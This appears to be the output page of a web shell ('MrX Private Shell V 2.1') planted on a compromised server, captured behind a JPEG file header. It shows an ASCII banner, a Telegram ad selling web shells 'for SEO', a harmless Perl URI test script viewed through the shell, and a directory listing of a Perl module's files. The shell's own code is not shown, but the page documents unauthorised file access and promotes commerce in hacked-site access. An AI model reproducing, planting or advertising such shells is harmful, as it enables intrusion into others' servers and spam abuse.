����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/usr/bin/perl -w
use strict;
use warnings;
sub usage {
my $prog = $0; $prog =~ s,.*/,,;
die "Usage: $prog <uri> [<method> [<args>]...]\n";
}
usage() unless @ARGV;
my $uri = shift;
my $orig = $uri;
require URI;
warn "Using: $INC{'URI.pm'}\n" if $INC{'URI.pm'} ne 'lib/URI.pm' and -t STDOUT and -t STDIN;
my @ctor_arg = ($uri);
push(@ctor_arg, shift) while @ARGV && $ARGV[0] =~ s/^\+//;
$uri = URI->new(@ctor_arg);
if (@ARGV) {
my $method = shift;
my $list_context = ($method =~ s/^\@//);
#print "URI->new(\"$uri\")->$method ==> ";
for (@ARGV) {
undef($_) if $_ eq "UNDEF";
}
my @result;
if ($list_context) {
@result = $uri->$method(@ARGV);
} else {
@result = scalar($uri->$method(@ARGV));
}
for (@result) {
if (defined) {
$_ = "�$_�" if /^\s*$/;
} else {
$_ = "<undef>";
}
}
print join(" ", @result), "\n";
}
print "$uri\n" unless $orig eq $uri;
exit;
# Some extra methods that might be nice
sub UNIVERSAL::class { ref($_[0]) }
sub UNIVERSAL::dump {
require Data::Dumper;
my $d = Data::Dumper->Dump(\@_, ["self", "arg1", "arg2", "arg3", "arg4"]);
chomp($d);
$d;
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| blib | Folder | 0755 |
|
|
| lib | Folder | 0775 |
|
|
| t | Folder | 0775 |
|
|
| xt | Folder | 0775 |
|
|
| CONTRIBUTING.md | File | 4.13 KB | 0644 |
|
| Changes | File | 29.23 KB | 0644 |
|
| LICENSE | File | 19.26 KB | 0644 |
|
| MANIFEST | File | 2.43 KB | 0644 |
|
| META.json | File | 29.13 KB | 0644 |
|
| META.yml | File | 18.57 KB | 0644 |
|
| MYMETA.json | File | 29.21 KB | 0644 |
|
| MYMETA.yml | File | 18.58 KB | 0644 |
|
| Makefile | File | 39.17 KB | 0644 |
|
| Makefile.PL | File | 1.98 KB | 0644 |
|
| README | File | 373 B | 0644 |
|
| cpanfile | File | 1.67 KB | 0644 |
|
| dist.ini | File | 5 KB | 0644 |
|
| perlimports.toml | File | 1.07 KB | 0644 |
|
| pm_to_blib | File | 0 B | 0644 |
|
| uri-test | File | 1.14 KB | 0755 |
|